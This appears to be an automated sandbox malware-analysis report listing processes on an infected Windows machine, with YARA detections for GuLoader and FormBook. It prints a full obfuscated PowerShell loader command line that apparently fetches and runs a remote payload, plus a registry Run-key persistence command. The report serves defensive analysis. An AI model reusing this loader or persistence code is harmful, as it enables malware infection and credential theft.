                                              Target ID:19
                                              Start time:07:40:43
                                              Start date:26/04/2024
                                              Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\oyatnpkwmshzkiypaztbxymclbnxnmdl"
                                              Imagebase:0x260000
                                              File size:516'608 bytes
                                              MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:20
                                              Start time:07:40:43
                                              Start date:26/04/2024
                                              Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\zbfe"
                                              Imagebase:0x260000
                                              File size:516'608 bytes
                                              MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:21
                                              Start time:07:40:44
                                              Start date:26/04/2024
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Antillean144.Gro && echo $"
                                              Imagebase:0x790000
                                              File size:236'544 bytes
                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:22
                                              Start time:07:40:50
                                              Start date:26/04/2024
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Raakolde = 1;$Fornrmet='S';$Fornrmet+='ubstrin';$Fornrmet+='g';Function Circumflexes($Cumulet){$Semimonarchically=$Cumulet.Length-$Raakolde;For($Habitually=4; $Habitually -lt $Semimonarchically; $Habitually+=(5)){$Wenzel+=$Cumulet.$Fornrmet.Invoke($Habitually, $Raakolde);}$Wenzel;}function Jettes($trendy){&($Indbagendes) ($trendy);}$Simultansceners=Circumflexes 'Ark,MMervoAn.czVampiT lel ElelBlreaSy.o/Jagt5 ve.Seac0T,sp Ryg.( KrmW.urdiRiitn s rdPi do.orhwAllosHjem G,oN PraT.oli ,eg1Inte0Remb.Spra0Anal;Duct Ret.WVagtiAtomnskyt6Aced4 Non;Falc F.glx.art6Pseu4.icr;Rovf MilrGramvNert:Nara1H,lg2Rive1Unde.Sopr0Pres)Vrd. P.slG,ndeeCubacSkinkTilloOffp/Slib2Pl r0Ned,1Appe0Onyc0Ven,1 enn0Trfi1 Bre V deFMickiKonsr traeA.trf dr oQrscxSamm/Moor1Hard2 ,or1Werf.,yde0.uto ';$Optrins45=Circumflexes 'tidsUI.prsP,yceSkabrover-StemAUkeng,ondeLivinE,tetHera ';$Levemulighed=Circumflexes 'B,slhG,ldt MentInflpKo,m:Conf/Ke,d/,ndf8Ago.7 bal.Pige1Cann2.ejl1 Fer.,rol1Diet0Nona5 Ske..ata1 Bl,6Ex.e3Kast/SrmrD Kile Ne.tSkreeIndmn rot MyxiBe aoKonknConse BoynDesi.s,rtj.attaDissv toda Non ';$Cose=Circumflexes 'Skor>Undi ';$Indbagendes=Circumflexes 'Dm,niMilieSelsx Bar ';$Nutritionary133='Paakldtes';Jettes (Circumflexes 'Ch dSSonaeAutotAlda-UnmyC.rocoValgn,annt Ende.enin S.dtO er Can- NobP ixta Fo.tBindhMe.k VrdiTSorg:Baga\Pt.rFbureoPot,rOutshTot,j S.iuretrlillesFletbTikmr GabeSmaamRadesAmoreT ivs.lbn.MargtAircx iltSaut Pote-La dVKinea Boll SafuEncaeDiap ,npr$CausN IlluDiglt Tndr,nbriKon,tBra,iUn.koDegenSpydaTricr egnyKrim1K.ip3Erem3L.eb; Bri ');Jettes (Circumflexes 'Tr.ni.inkfHoo. Skil(Indit AroeUndesuafmtEpit-DrukpFareaSkibtDuplhAfid silTRuck:None\Sla,F Sgeo Bu,rTec.hobsejAp.puQuanlBloks ostbs,mmrP osePal.mSocisCudbe Pics A,m.Te rtBre,xDigit ,fl),era{Giske andxRe aiNacrtCham}Pg.e;Ergo ');$Ballplayers248 = Circumflexes ' nkeSpikc Udmhsiego lgu Eksp%S,paaBagepTaktpOtopdElemaimpetarchaTran%She,\ParaATrignKolltHo,eiangulSkrmltr.ke Anpa JounChr,1Umed4 C.s4Sur...lumGVilkrBel.oJe n Ef e&sa,m&D.ge UpfieBil cUnnah KreoN,np Ci.i$ Kri ';Jettes (Circumflexes 'Real$,eclgFalsl.nifoAxi,bWolfaAfselCoin:SgesFScrso vrmrBrbaaBronn kkek Tabr,obbiGre nResig Kr,s oltpOveruCafenOverksol t KureBagnt Bits .ps=Abd.(dab,cSju.mEl md ,in Ferr/Calcc Ch, F rs$BedrBPi radra,lSna lurfjpMarklDialaIrr.yIndve R,trSeiss Puz2Duct4Ba.h8Phot)Dri ');Jettes (Circumflexes 'Ha.l$SlvsgEftel nfoSt,ibM.inaTabplTick: SpeA MoklEctovSubte UneoRegilSndaiErodtDispemdresTol =Lnn,$MyndLRaskeSkilv W.veForbmStrauf rflGauki.azigYemehPreee TradDole.RegesEft.p Ci.lIndaiVar.tVa,e(Sume$EnheCFormo.dves Pree G.n)Spil ');$Levemulighed=$Alveolites[0];Jettes (Circumflexes 'Anbr$.addgU.trl ,taoim ebTa.ba.alclB,nk:BestS.orkk GibeM,aspJotatS yti ,uncCoa,=partNDagbe KecwUrok-,lafOwainb ejljSkrseUns.curo.t.onc B anSSvalyVands igmtM.sceJug mSoap.FascNPhyleFre,t iga..oncWHetee Cikb istCDeralkin iSporeMetanMapptF er ');Jettes (Circumflexes ' Hic$DefiSGoo k.orteTranpNulvtgummi,nfrcO,dy. skrHUn ieAa aa PerdSp,reBillrJordsB.am[Frug$FormOSuttpFidutLnsird nkiGiggnBlansfeer4I da5Over]Korv=Reig$di,kS StuiUhelmInseuKnsklLeattu,spadur.nQuadsEmulc CykeSlavn H pe Regr fkosUdry ');$Isoln=Circumflexes ' .meS,ondkSka eSemipUndetSpgeiP,nccAver.Mer.DAnomoP stw.deanthrolov roFarta N,ddSt dFAssui Krel Bd,eUntr(Ove,$OmsoLScarePerevDyreeflyvmJi buStorl Kkki PergWarnh ikleFuldd .dr,Gfor$.aktHEpisvPriniHarerSexuv PholBll e Pros ya)un.h ';$Isoln=$Forankringspunktets[1]+$Isoln;$Hvirvles=$Forankringspunktets[0];Jettes (Circumflexes ' Sh $Eft gPounlFromoUfatb iea S,ilUnc,:CasuPFlanuStjdnVaskc B.otRighuU.tis Sor=hu,t(SculTCorreOutks Th,tReal-SyttP avaRingt Tr hThru Modt$GlauH.elfvForkiTensrr.prvMowelLaise Pe.s eat) Tyn ');while (!$Punctus) {Jettes (Circumflexes 'Unpr$B.blgPolylPorto Ba.bKampaAzidlPaal:MonomUdslaharorCanacBdeaeBr.nsSupecSubreSretn ThocTor.eDat,=Macr$.xtrtOverrBobbuNonseHnge ') ;Jettes $Isoln;Jettes (Circumflexes ' MinSKu.ttPensaOverr ynetMatr-PromSMin lThimeCosteSkndpSkva npa4,esp ');Jettes (Circumflexes 'Ufor$ SilgKat.lLiquochokbBrnda Trol kur:SnowPPostuAndenAnlgcAf.utSk.duAffesOver=Bram( afgT DrieRemisOwentFelt- UdfPBlomaD,fftRe,vhNd.i Frad$ ollH Tipv ProiHyd rUp.av ForlBefoeProjsHjes)Sewm ') ;Jettes (Circumflexes 'Coin$ OrngWaftlB.reo veb Scoa AttlQuis:.axiVDekroAggrl Spol s.ae ParyJingbResuaAlcolDamplVo,dsBlr,=Skub$ProtgRufflserooR.cibLe ea MenlAr,o: O.eMEmmeaTommgForriUdbrkK.sse,kkor.trinAksge aars.jem+Inst+ T l%Prom$BecrAVarsl UdtvShoreHvo,oLeavlTrieiCrybtAcceeTveds Jvn.LeptcMetaoRegou eren,amnt .is ') ;$Levemulighed=$Alveolites[$Volleyballs];}Jettes (Circumflexes 'Anon$ LiggAsenlUnchoOph.bPalaa utilSubm:TndeHCyatoConcvNonoeDelidApoksBruntStemrHermuCou,kringtr thuRingrUheleSrstrBiocnSla.e,refsTil, D.st=Matr Di,GAmate galtBesk-DissCNon.oCournPartt FoueUf.dnM,wstCamb Vi.r$VatiHkapevHydri LetrStatvA,allSpaaeCocos Hae ');Jettes (Circumflexes 'Tenn$ JusgPorzl HolochacbUnp aB,vrl Uar:chawAPostbOpgrjModeuScordForgi.yrec andaOvert,tereHern Diss= sta Ciga[flagSHoveyAfghsJesut Sube ConmTool. VrdCSingoForfn Myov,rlleOthir s.itUnva]Astr:Kont:BeviFsamorCarroPlanmliftBanh aTil,sC.rreDown6arbe4UnfrSA.altFestr Veji Civn,tilg,onr(Fors$KnskH PeroPrebv.oule StadForusWrestPerirs.etuser k TaltEkstuDecarPumpeHyper Ne.n H,le Mims Uds)Br.c ');Jettes (Circumflexes ',eta$O elgEr,vl BenoskrmbmesoaMalllAlon:bifiLS.tivA.glhAstry ObetModetud.meSk,lr KlonEmboeSupe Ungd=Stil prie[ChurS isey kovsInittEl ve HucmGram. In,TBazoeKonsxRu,gtSk,a. VogE,ekanhempc ,oso MatdStn,iDrifnSa mgAdmi] Pej: La : MasAInskSStriC Ud,I ComIInda.UnreGVarieTeatt .ilSSmeltPaver U.fiMyrenManggAgna(Dekl$GuidA.omabOrdrjFreiu .tad,onhiUnfacIndka KabtRelaeGoom) U,l ');Jettes (Circumflexes 'Semi$Par,gNongl SupoB,rebBe raGrsrlF.ld:Res,SMultk Foli fugkU,sak GeneBol,lAcets frueconjnSm.tsR bb=luge$NotaL ,gev,aglh UngyMam.tFarvtPayoeSatirSisynKom,e ,ke.Ka,as.onbuDeutb KoesBorutSeksrEli iTelenMyopgtra,(Ser,3Faul1O.om4Efte7 lot8Unwa4 Fr.,Forb2 .lo6 Mid3Ba o0.arv2Mis )Coup ');Jettes $Skikkelsens;"
                                              Imagebase:0xfe0000
                                              File size:433'152 bytes
                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000016.00000002.2900248668.0000000008830000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000016.00000002.2872130350.0000000005A41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000016.00000002.2900609762.000000000902B000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              Has exited:true

                                              General

                                              Target ID:23
                                              Start time:07:40:51
                                              Start date:26/04/2024
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Antillean144.Gro && echo $"
                                              Imagebase:0x790000
                                              File size:236'544 bytes
                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:24
                                              Start time:07:41:07
                                              Start date:26/04/2024
                                              Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                              Imagebase:0x260000
                                              File size:516'608 bytes
                                              MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:25
                                              Start time:07:41:07
                                              Start date:26/04/2024
                                              Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                              Imagebase:0x260000
                                              File size:516'608 bytes
                                              MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000019.00000002.3019175755.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000019.00000002.3019175755.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000019.00000002.3056858069.0000000023690000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000019.00000002.3056858069.0000000023690000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                              Has exited:true

                                              General

                                              Target ID:26
                                              Start time:07:41:11
                                              Start date:26/04/2024
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "bynkefugls" /t REG_EXPAND_SZ /d "%Deciduate% -w 1 $Xdiv=(Get-ItemProperty -Path 'HKCU:\Clouters\').Slapperne;%Deciduate% ($Xdiv)"
                                              Imagebase:0x790000
                                              File size:236'544 bytes
                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:27
                                              Start time:07:41:11
                                              Start date:26/04/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6d64d0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:28
                                              Start time:07:41:11
                                              Start date:26/04/2024
                                              Path:C:\Windows\SysWOW64\reg.exe
                                              Wow64 process (32bit):true
                                              Commandline:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "bynkefugls" /t REG_EXPAND_SZ /d "%Deciduate% -w 1 $Xdiv=(Get-ItemProperty -Path 'HKCU:\Clouters\').Slapperne;%Deciduate% ($Xdiv)"
                                              Imagebase:0x560000
                                              File size:59'392 bytes
                                              MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:29
                                              Start time:07:41:26
                                              Start date:26/04/2024
                                              Path:C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe"
                                              Imagebase:0xc0000
                                              File size:140'800 bytes
                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000001D.00000002.3291632690.00000000044E0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001D.00000002.3291632690.00000000044E0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                              Has exited:false

                                              General

                                              Target ID:30
                                              Start time:07:41:27
                                              Start date:26/04/2024
                                              Path:C:\Windows\SysWOW64\clip.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\SysWOW64\clip.exe"
                                              Imagebase:0xf30000
                                              File size:24'576 bytes
                                              MD5 hash:E40CB198EBCD20CD16739F670D4D7B74
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000001E.00000002.3289864871.0000000000D40000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001E.00000002.3289864871.0000000000D40000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000001E.00000002.3289791266.0000000000D00000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001E.00000002.3289791266.0000000000D00000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000001E.00000002.3288503989.0000000000460000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001E.00000002.3288503989.0000000000460000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                              Has exited:false

                                              General

                                              Target ID:31
                                              Start time:07:41:41
                                              Start date:26/04/2024
                                              Path:C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe"
                                              Imagebase:0xc0000
                                              File size:140'800 bytes
                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000001F.00000002.3289923987.0000000000F40000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001F.00000002.3289923987.0000000000F40000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                              Has exited:false

                                              General

                                              Target ID:32
                                              Start time:07:41:46
                                              Start date:26/04/2024
                                              Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                              Imagebase:0x260000
                                              File size:516'608 bytes
                                              MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:33
                                              Start time:07:41:47
                                              Start date:26/04/2024
                                              Path:C:\Windows\System32\rundll32.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                              Imagebase:0x7ff6d2f00000
                                              File size:71'680 bytes
                                              MD5 hash:EF3179D498793BF4234F708D3BE28633
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:34
                                              Start time:07:41:53
                                              Start date:26/04/2024
                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                              Imagebase:0x7ff79f9e0000
                                              File size:676'768 bytes
                                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              General

                                              Target ID:35
                                              Start time:07:41:54
                                              Start date:26/04/2024
                                              Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                              Imagebase:0x260000
                                              File size:516'608 bytes
                                              MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Disassembly

                                              Reset < >

                                                Executed Functions

                                                Function 00007FF848F4CEC6 Relevance: .5, Instructions: 474COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2714562965.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7ff848f40000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 43e21ddf65fa6661e23f70a3be94cab0c5c5a9f23475ad7170c21be9ee49a3d5
                                                • Instruction ID: 244aedaa13f5081e981be2ccb9745eb96a0842151fd7506a655c0695cddce036
                                                • Opcode Fuzzy Hash: 43e21ddf65fa6661e23f70a3be94cab0c5c5a9f23475ad7170c21be9ee49a3d5
                                                • Instruction Fuzzy Hash: A7F1733091CA8D8FEBA8EF28C8557E937D1FF64350F04426AE84DC72D5DB38A9458B85
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00007FF848F4DC72 Relevance: .5, Instructions: 460COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2714562965.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7ff848f40000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9c619ad97548356f16ce0f2c18bc757651aacd2def1c87d4b4f46f243f3a50bd
                                                • Instruction ID: 4fa31f5e2525d7d5b8967a19dca17abd6a0fc75eb7c33b8820be5d4f8961af7e
                                                • Opcode Fuzzy Hash: 9c619ad97548356f16ce0f2c18bc757651aacd2def1c87d4b4f46f243f3a50bd
                                                • Instruction Fuzzy Hash: C5E1903090CA4D8FEBA8EF28C8557E977E1FF64750F04426EE84DC7295CB78A9458B81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00007FF84901182D Relevance: 2.2, Strings: 1, Instructions: 979COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2716282365.00007FF849010000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849010000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7ff849010000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: I
                                                • API String ID: 0-3707901625
                                                • Opcode ID: ff80bda75fc6b6a26ae31c4ef8b635fd6adfeb66e352940c37fd3699f2cb9d4b
                                                • Instruction ID: 43dfbe476905a948ef54a184cf8bed77ebef4f31abc5353e341b1ac8a8df05cc
                                                • Opcode Fuzzy Hash: ff80bda75fc6b6a26ae31c4ef8b635fd6adfeb66e352940c37fd3699f2cb9d4b
                                                • Instruction Fuzzy Hash: A462BE31D0DA8A8FEBA9EF288856A647BE1FF55350F5801BEC00DC7193EA29EC45C741
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00007FF849011DDF Relevance: 2.0, Strings: 1, Instructions: 741COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2716282365.00007FF849010000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849010000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7ff849010000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: I
                                                • API String ID: 0-3707901625
                                                • Opcode ID: 8587b94ee7be940b2a398b5a6b5aedf428085321bd24648365fe8beb248bfd05
                                                • Instruction ID: 2993677142b3bb3035de3c878a43a8575ea615107f2a0782a95d65e54ee2d207
                                                • Opcode Fuzzy Hash: 8587b94ee7be940b2a398b5a6b5aedf428085321bd24648365fe8beb248bfd05
                                                • Instruction Fuzzy Hash: 52428E30E0DA8A8FEBE9EF288455A647BE1FF65740B5401BDC00DD7293EA29EC45C741
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00007FF849019CD4 Relevance: .5, Instructions: 459COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2716282365.00007FF849010000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849010000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7ff849010000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 949edd3eb5e7e463bb1a3bea2bc9eac5c7359d1b2767704a92c61b645f89aace
                                                • Instruction ID: 0cbbc12f40c1602deb286ec306d3be9cf6419f16122df2f34d107172bc951179
                                                • Opcode Fuzzy Hash: 949edd3eb5e7e463bb1a3bea2bc9eac5c7359d1b2767704a92c61b645f89aace
                                                • Instruction Fuzzy Hash: B7E11731D0DECA8FEBA9EF28A8565B57BE1EF55390F1801BED01DC71D6EA19D8018701
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00007FF849014B35 Relevance: .4, Instructions: 431COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2716282365.00007FF849010000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849010000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7ff849010000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d586db8df3767171c98c159244dfc3504cc25a8512322131ed0f0012711a86ac
                                                • Instruction ID: b637e0cc6dfe16e06acddbe69a56ab768e2d36989cda1ec41a43151362a2eb15
                                                • Opcode Fuzzy Hash: d586db8df3767171c98c159244dfc3504cc25a8512322131ed0f0012711a86ac
                                                • Instruction Fuzzy Hash: EAD12471D0EACA9FEBA5EF6858565B57BE0FF55390F0800BAD04DC71E3EA19E8018351
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00007FF849019E67 Relevance: .2, Instructions: 150COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2716282365.00007FF849010000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849010000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7ff849010000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 95ba108a0452bd2866bd52243c1c50a00ec19d2cc2b360f168a8103b9582a945
                                                • Instruction ID: f593f595ebf665a68eabad8a9b1676af3083ebc94357dce66054466605fa255e
                                                • Opcode Fuzzy Hash: 95ba108a0452bd2866bd52243c1c50a00ec19d2cc2b360f168a8103b9582a945
                                                • Instruction Fuzzy Hash: 6F411331D0EECADFEBA5EB2868561B476E1EF54390B5801BAD02CC31E6EE1DDC408301
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00007FF848F43945 Relevance: .0, Instructions: 49COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2714562965.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7ff848f40000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                • Instruction ID: 6844502bb12e6936a31c054fe55ce34861744de46e0db52a3f4fb09dbe218d9a
                                                • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                • Instruction Fuzzy Hash: D001677111CB0C4FD744EF0CE451AA5B7E0FB95364F10056EE58AC3695D736E881CB45
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                Function 00007FF848F48545 Relevance: 7.9, Strings: 6, Instructions: 356COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2714562965.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7ff848f40000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: K_^$K_^$K_^$K_^$K_^$K_^
                                                • API String ID: 0-3805565700
                                                • Opcode ID: e6157b3580c9c2f62b546bfe3a360ac72a207e6c3ae94a3313e3b9b1ac386ea4
                                                • Instruction ID: 922adb9ce8b860e08676d489a657fe807657dcfaf18c5789fd3c517f0a609c59
                                                • Opcode Fuzzy Hash: e6157b3580c9c2f62b546bfe3a360ac72a207e6c3ae94a3313e3b9b1ac386ea4
